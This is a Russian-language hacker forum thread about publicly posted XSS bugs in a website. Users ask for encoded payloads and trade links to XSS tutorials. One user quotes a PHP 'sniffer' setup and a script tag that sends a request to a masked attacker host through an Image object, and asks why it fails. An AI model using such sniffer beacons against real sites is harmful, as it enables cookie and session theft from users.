Короче, это нашел не я. Уязвимости лежат в паблике уже долгое время. Обнаружил не я, а типуля, судя по сайту ему 16 лет. Короче респект и уважуха таким )) Надеюсь, если он выложил их в паблик, то ему их не жалко (засекаем время): http://usatikov.com/bugs.php
Нлять пацаны дайте кто нить в закодированном виде...я сам это делаю с трудом ...докуя времени уйдет. А так бага вполне рабочая думаю.
уже 8 часов прошло со времени создания поста, еще не закрыли )) Хотя выходные же ). Наверное еще и завтра работать будут )
Наверное нашел ту же самую багу, оповестил техподдержку и теперь бага, которая была найдена еще до него будет закрыта.
Создал сниффер на php хосте. Набираю в строке браузера http://****/data.php?1. В логах приходит "1". Все нормально. Создаю html страничку к кодом: <script type="text/javascript"> img=new Image(); img.src="http://****/data.php?1" </script> Загружаю ее в своем браузере. Ничего на сниффер не приходит. Почему?
а конкретно кто то может создать видео для ламеров КАК ВСЁ ВЫШЕ НАПИСАНОЕ ИСПОЛЬЗОВАТЬ НА ПРАКТИКЕ а то извините тут все такие программисты и гуру, что ваши слова как "матюки" не опытному пользователю - не понятно
2itiran Почитай хотябы простенькие статьи по XSS, можешь начать с этого http://forum.antichat.ru/thread20140.html Потом найди более подробную статью, рекомендую статью Zadoxlik'a опубликованную в августовском Хакере. Без базового знание, и видео тебе вряд ли будет интересно и полезно
Ну разве сложно ответить просто на вопрос? Я же не прошу сказать почему не работаеть такая то XSS. Я хочу узнать почему не выполняется такой скрипт: <script type="text/javascript"> img=new Image(); img.src="http://****/data.php?1" </script>
http://www.xakep.ru/articles/magazine/archive.asp?magazine=xa&year=2006 Восьмой номер. Сливай PDF арихив и читай
